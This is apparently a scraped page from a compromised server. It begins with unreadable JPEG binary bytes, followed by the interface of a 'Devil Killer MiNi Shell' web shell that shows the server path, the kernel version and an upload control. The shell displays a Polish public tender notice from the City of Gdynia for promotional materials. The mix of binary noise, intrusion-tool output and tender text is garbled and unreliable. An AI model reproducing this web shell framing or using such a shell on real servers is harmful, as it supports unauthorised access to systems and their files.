JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20240904/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20240904/0048481401-N-2024.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Przedmiotem zamówienia jest wykonanie i dostawa materiałów promocyjnych na potrzeby Gminy Miasta Gdyni. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Miasta Gdyni</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 191675557</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Al. Marszałka Piłsudskiego 52/54</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Gdynia</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">81-382</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL633 - Trójmiejski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">joanna.dlugosz@gdynia.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://bip.um.gdynia.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Przedmiotem zamówienia jest wykonanie i dostawa materiałów promocyjnych na potrzeby Gminy Miasta Gdyni. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-005b581b-e1a9-4d55-b750-c776613799f4</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2024/BZP 00484814</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2024-09-04</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00023486/25/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.7 Dostała materiałów i gadżetów promocyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://portal.smartpzp.pl/umgdynia <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://portal.smartpzp.pl/umgdynia</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Korzystanie z Platformy Portal Smart PZP możliwe jest pod warunkiem spełnienia przez sprzęt, z którego korzystają użytkownicy Wykonawcy, następujących minimalnych wymagań technicznych i specyfiki połączenia:<br/>- posiadanie komputera o parametrach umożliwiających zainstalowanie następującego oprogramowania:<br/>1.1.	w zakresie podstawowych funkcjonalności – przegląd, pobieranie i załączanie dokumentów:<br/>1.1.1.Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min. 3 GB RAM, procesor 1500 MHz lub lepszy, jeden z systemów operacyjnych Linux Kernel 4.0, Windows 7 i MacOS 10.12 - lub ich nowsze wersje<br/>1.1.2.przeglądarka internetowa Mozilla Firefox ver. 65 i późniejsze, Google Chrome ver. 66 i <br/>późniejsze lub Opera w ver. 58 i późniejsze, Microsoft Edge ver 18 i późniejsze, Internet Explorer 11,<br/>1.1.3.Lista zalecanych przeglądarek internetowych: Google Chrome, Mozilla Firefox,Opera. <br/>Szczegółowe zapisy znajdują się w Rodz. VII SWZ</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">EZP 51/24</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem niniejszego postępowania jest wykonanie i dostawa materiałów promocyjnych na potrzeby Gminy Miasta Gdyni. Zamawiający będzie zlecał przedmiot zamówienia przekazując pliki do wykonania materiałów za pośrednictwem poczty elektronicznej na adres wskazany przez Wykonawcę.<br/>Wykonawca będzie realizował poszczególne pozycje przedmiotu zamówienia zgodnie z terminem, który wskaże w Formularzu Oferty (załącznik 2 do SWZ). Maksymalny termin dostawy określony jest przez Zamawiającego na 60 dni od dnia zawarcia umowy, przy czym za podanie w Formularzu Oferty krótszego terminu dostawy Wykonawca otrzyma punkty wg jednego z kryteriów oceny ofert określonego w SWZ – terminu dostawy. W przypadku, kiedy w Formularzu Oferty punkt 2 dot. terminu dostawy materiałów promocyjnych „deklarowany termin” nie zostanie uzupełniony, Zamawiający przyjmie, że Wykonawca oferuje wykonanie przedmiotu zamówienia w maksymalnym terminie wymaganym przez Zamawiającego.<br/><br/>W cenie: Zamawiający wymaga, a Wykonawca zobowiązuje się wykonać prototypy (materiały próbne) wszystkich nw. materiałów promocyjnych i dostarczyć je do siedziby Zamawiającego do akceptacji. Podany przez Wykonawcę w ofercie termin wykonania przedmiotu umowy musi uwzględniać czas niezbędny na wykonanie prototypów, dostarczenie ich Zamawiającemu oraz akceptację przez Zamawiającego.<br/>Termin na przekazanie Zamawiającemu materiałów próbnych (prototypów) do akceptacji – do 14 dni kalendarzowych liczonych od dnia przesłania przez Zamawiającego materiałów graficznych i informacji koniecznych do prawidłowego wykonania przedmiotu umowy.<br/>Termin na dostawę całości zamówienia do siedziby Zamawiającego – wskazany w ofercie, liczony od dnia zawarcia umowy. <br/>Przedmiot zamówienia obejmuje wykonanie i dostawę materiałów promocyjnych dla miasta Gdyni o niżej wymienionych parametrach:<br/>1. Brelok odblaskowy w kształcie koła<br/>Parametry:<br/>Ilość: 2000 sztuk <br/>Brelok w kształcie koła w kolorze żółtym odblaskowym z karabińczykiem lub/i metalowym kółkiem na klucze<br/>Średnica koła: 60 mm<br/>Materiał: miękki odblaskowy plastik<br/>Nadruk: jeden kolor, w jednym miejscu, min. 35 x 30 mm <br/>Nadruk logo w jednym kolorze, według projektu przesłanego przez Zamawiającego. <br/>2. Brelok filcowy dwukolorowy<br/>Parametry:<br/>Ilość: 1000 sztuk - po 500 sztuk z każdej wersji kolorystycznej<br/>Model owalny z wycinką na taśmę, (taśma wszyta)<br/>Filc produkcji polskiej, dwie warstwy w kolorach białym i granatowym o grubości 3 mm każda warstwa, stabilizowane <br/>Wymiary: 120 mm x 30 mm<br/>Taśma pomarańczowa PP (polipropylenowa), szer. 10 mm, długość do zapętlenia 60 mm<br/>Kółko sprężynowe do kluczy<br/>Klejenie warstw klejem polimerowym<br/>Znakowanie przez wycinkę<br/>Wykonanie wg projektu dostarczonego przez Zamawiającego.<br/>3. Czapka z daszkiem<br/>Parametry:<br/>Ilość: 300 sztuk<br/>Skład: bawełna czesana 260 g/m2<br/>Kolor granatowy, rozmiar uniwersalny, z tyłu regulacja na rzep <br/>Nadruk logo w jednym kolorze, według projektu przesłanego przez Zamawiającego, ok. 50 mm w podstawie.<br/>4. Długopis papierowy<br/>Parametry:<br/>Ilość: 3000 sztuk.<br/>Długopis papierowy ze skuwką.<br/>Tworzywo: papier<br/>Długość:145 mm<br/>Kolor: niebieski <br/>Typ wkładu: slim/jednorazowy<br/>Kolor wkładu: niebieski<br/>Znakowanie: nadruk logo Gdyni jednokolorowy w jednym miejscu, według projektu przesłanego przez Zamawiającego.<br/>5. Koszulka z krótkim rękawem<br/>Parametry:<br/>Ilość: 200 sztuk<br/>Koszulka z krótkim rękawem Unisex<br/>Kolor: granatowy<br/>Skład materiału: min. 90% bawełny<br/>Eko bawełna<br/>Nadruk w dwóch miejscach (przód koszulki: motyw graficzny format ok. A4, logo na rękawie), według projektu przesłanego przez Zamawiającego.<br/>Rozmiary: S, M, L, XL<br/>Rozmiary: <br/>ad. 1). 30 x S, 45 x M, 70 x L, 45 x XL, 10 x 2XL<br/>ad. 2). 50 x S, 65 x M, 110 x L, 65 x XL, 10 x 2XL<br/>Gramatura nie mniej niż 160 gr.<br/>6. Komplet 6 sztuk kredek w tubie z temperówką<br/>Parametry:<br/>Ilość: 1000 sztuk<br/>Zestaw 6 kredek w sześciu kolorach w tubie z kartonu. Przezroczyste wieczko z temperówką.<br/>Wymiary: średnica podstawy: ok. 27 mm, wysokość: ok. 100 mm<br/>Kolor wieczka: przezroczysty niebieski<br/>Nadruk: logo w jednym kolorze, ok. 50 mm w podstawie, według projektu przesłanego przez Zamawiającego.<br/>7. Ołówek<br/>Parametry:<br/>Ilość: 2000 sztuk<br/>Długość: ok. 175 mm <br/>Materiał: drewno, zabarwione na czarno<br/>Kolor druku: srebrny<br/>Rozmiar znakowania: 29 x 4 mm<br/>Znakowanie: jednokolorowy nadruk logo Gdyni, w jednym miejscu, według projektu przesłanego przez Zamawiającego.<br/>Naostrzenie: tak<br/>Gumka do mazania: brak<br/>8. Torba składana na zakupy, z materiału pochodzącego z recyklingu<br/>Parametry:<br/>Ilość: 500 sztuk<br/>Torba materiałowa granatowa, składana, z dwoma uchwytami.<br/>Torba w rozmiarze: szerokość: 375 mm, głębokość: 3 mm, długość: 52 mm – 55 mm Materiał: materiał pochodzący z recyklingu<br/>Nadruk: 1 kolor, w dwóch miejscach – w wymiarze maksymalnie 140 x 110 mm +/- 20 mm oraz maksymalnie 45 x 35 mm +/- 1 mm, według projektu przesłanego przez Zamawiającego.<br/>9. Torba papierowa szara A3<br/>Parametry:<br/>Ilość: 300 sztuk<br/>Torba papierowa szara<br/>Torba w rozmiarze 310 x 120 x 410 mm +/- 30 mm<br/>Gramatura papieru 90 g, papier kratowy prążkowany<br/>Skręcane rączki<br/>Nadruk 1 kolor w dwóch miejscach (po obu stronach torby) – o wymiarze maksymalnie 120 x 150 mm, według projektu przesłanego przez Zamawiającego.<br/>10. Torba papierowa szara A4<br/>Parametry:<br/>Ilość: 2000 sztuk<br/>Torba papierowa szara<br/>Torba w rozmiarze 250x110x320 mm +/- 30 mm<br/>Gramatura papieru 90 g, papier kratowy prążkowany<br/>Skręcane rączki<br/>Nadruk: 1 kolor w dwóch miejscach (po obu stronach torby) – o wymiarze maksymalnie 120 x 150 mm, według projektu przesłanego przez Zamawiającego.<br/>11. Worek szkolny<br/>Parametry:<br/>Ilość: 1000 sztuk<br/>Bawełniany worek o wymiarze 370 x 420 mm <br/>100% bawełna diagonalna, 270 -280 g/m2 <br/>Kolor worka granat, kolor sznurków biały<br/>Nadruk: w formacie maks. A4, 1 kolor w jednym miejscu na froncie worka, według projektu przesłanego przez Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">22462000-6 - Materiały reklamowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">60 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> Informacja o warunkach udziału w postępowaniu (Rozdział VIII SWZ)<br/>1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy:<br/>1.1. nie podlegają wykluczeniu na zasadach określonych w Rozdziale IX SWZ oraz<br/>1.2. spełniają warunki udziału w postępowaniu dotyczące:<br/>1.2.1. zdolności technicznej lub zawodowej w zakresie:<br/>a) doświadczenia Wykonawcy: Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wykonał co najmniej 2 zamówienia polegające na dostawie breloków lub czapek lub długopisów lub koszulek lub kompletów kredek lub ołówków lub toreb składanych lub toreb papierowych lub worków o wartości nie mniejszej niż 20 tys. zł brutto każde.<br/><br/>W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia powyższy warunek musi spełniać w całości co najmniej jeden z tych Wykonawców.<br/><br/>W przypadku polegania przez Wykonawcę na zdolnościach podmiotu udostępniającego zasoby, w myśl art. 118 ustawy Pzp, powyższy warunek musi spełniać w całości podmiot udostępniający zasoby. <br/>1.2.2. sytuacji ekonomicznej lub finansowej,<br/>	Zamawiający nie stawia warunku w powyższym zakresie. <br/>1.2.3. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów,<br/>Zamawiający nie stawia warunku w powyższym zakresie. <br/>1.2.4. zdolności do występowania w obrocie gospodarczym,<br/>	Zamawiający nie stawia warunku w powyższym zakresie.<br/>2. Oceniając zdolność techniczną lub zawodową Zamawiający może, na każdym etapie postępowania, uznać, że Wykonawca nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/><br/>Podstawy wykluczenia (Rozdział IX SWZ) <br/>1. Zamawiający wykluczy z postępowania Wykonawcę w okolicznościach określonych w:<br/>1.1. art. 108 ust. 1 ustawy Pzp,<br/>1.2. art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835 ze zm.).<br/>Zamawiający, w ramach weryfikacji przesłanek wykluczenia, o których mowa powyżej, zastrzega możliwość wezwania Wykonawcy do złożenia wyjaśnień.<br/>2. Wykonawca nie podlega wykluczeniu w okolicznościach określonych w art. 108 ust. 1 pkt 1, 2 i 5 ustawy Pzp, jeżeli udowodni Zamawiającemu, że spełnił łącznie następujące przesłanki:<br/>2.1. naprawił lub zobowiązał się do naprawienia szkody wyrządzonej przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem, w tym poprzez zadośćuczynienie pieniężne;<br/>2.2. wyczerpująco wyjaśnił fakty i okoliczności związane z przestępstwem, wykroczeniem lub swoim nieprawidłowym postępowaniem oraz spowodowanymi przez nie szkodami, aktywnie współpracując odpowiednio z właściwymi organami, w tym organami ścigania, lub Zamawiającym;<br/>2.3. podjął konkretne środki techniczne, organizacyjne i kadrowe, odpowiednie dla zapobiegania dalszym przestępstwom, wykroczeniom lub nieprawidłowemu postępowaniu, w szczególności:<br/>2.3.1. zerwał wszelkie powiązania z osobami lub podmiotami odpowiedzialnymi za nieprawidłowe postępowanie Wykonawcy,<br/>2.3.2. zreorganizował personel,<br/>2.3.3. wdrożył system sprawozdawczości i kontroli,<br/>2.3.4. utworzył struktury audytu wewnętrznego do monitorowania przestrzegania przepisów, wewnętrznych regulacji lub standardów,<br/>2.3.5. wprowadził wewnętrzne regulacje dotyczące odpowiedzialności i odszkodowań za nieprzestrzeganie przepisów, wewnętrznych regulacji lub standardów.<br/>3. Na podstawie przepisu art. 7 ust. 1 w zw. z ust. 9 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego (Dz.U. z 2022 r. poz. 835 ze zm.), zwana dalej „ustawą sankcyjną” z postępowania o udzielenie zamówienia publicznego wyklucza się:<br/>3.1. Wykonawcę oraz uczestnika konkursu wymienionego w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisanego na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej;<br/>3.2. Wykonawcę oraz uczestnika konkursu, którego beneficjentem rzeczywistym w rozumieniu ustawy z dnia 1 marca 2018 r. o przeciwdziałaniu praniu pieniędzy oraz finansowaniu terroryzmu (Dz. U. z 2022 r. poz. 593 i 655) jest osoba wymieniona w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisana na listę lub będąca takim beneficjentem rzeczywistym od dnia 24 lutego 2022 r., o ile została wpisana na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej;	<br/>3.3. Wykonawcę oraz uczestnika konkursu, którego jednostką dominującą w rozumieniu art. 3 ust. 1 pkt 37 ustawy z dnia 29 września 1994 r. o rachunkowości (t.j. Dz. U. z 2022 r. poz. 593 ze zm.), jest podmiot wymieniony w wykazach określonych w rozporządzeniu 765/2006 i rozporządzeniu 269/2014 albo wpisany na listę lub będący taką jednostką dominującą od dnia 24 lutego 2022 r., o ile został wpisany na listę na podstawie decyzji w sprawie wpisu na listę rozstrzygającej o zastosowaniu środka, o którym mowa w art. 1 pkt 3 ustawy sankcyjnej.<br/>4. W celu potwierdzenia braku istnienia okoliczności, o których mowa w ust. 9.3., Zamawiający zastrzega możliwość samodzielnego badania ogólnodostępnych rejestrów, w tym Centralnej Ewidencji i Informacji o Działalności Gospodarczej, Krajowego Rejestru Sądowego oraz Centralnego Rejestru Beneficjentów Rzeczywistych. W uzasadnionych przypadkach Zamawiający będzie żądał przedłożenia przez Wykonawców w wyznaczonym terminie koniecznych dokumentów lub oświadczeń, w szczególności poświadczonego przez Wykonawcę za zgodność z oryginałem wyciągu z księgi udziałów lub rejestru akcji.<br/>5. W celu potwierdzenia braku istnienia okoliczności, o których mowa w ust. 9.3., Wykonawcy zagraniczni będą zobowiązani do przedkładania w wyznaczonym terminie dokumentów z odpowiedniego rejestru, takiego jak rejestr sądowy, albo w przypadku braku takiego rejestru, inny równoważny dokument wydany przez właściwy organ sądowy lub administracyjny kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania wraz z tłumaczeniem na język polski. Zdanie 2 ust. 2 stosuje się odpowiednio.<br/>6. Wykluczenie Wykonawcy, o którym mowa w ust. 1 następuje na okres trwania tej okoliczności.<br/>7. Oferta Wykonawcy, o którym mowa w ust. 1 zostanie odrzucona.<br/>8. Zamawiający oceni, czy podjęte przez Wykonawcę czynności, o których mowa w pkt. 2. są wystarczające do wykazania jego rzetelności, uwzględniając wagę i szczególne okoliczności czynu Wykonawcy. Jeżeli podjęte przez Wykonawcę czynności, o których mowa w pkt. 2., nie są wystarczające do wykazania jego rzetelności, Zamawiający wyklucza Wykonawcę.<br/>9. Wykonawca może zostać wykluczony przez Zamawiającego na każdym etapie postępowania o udzielenie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span 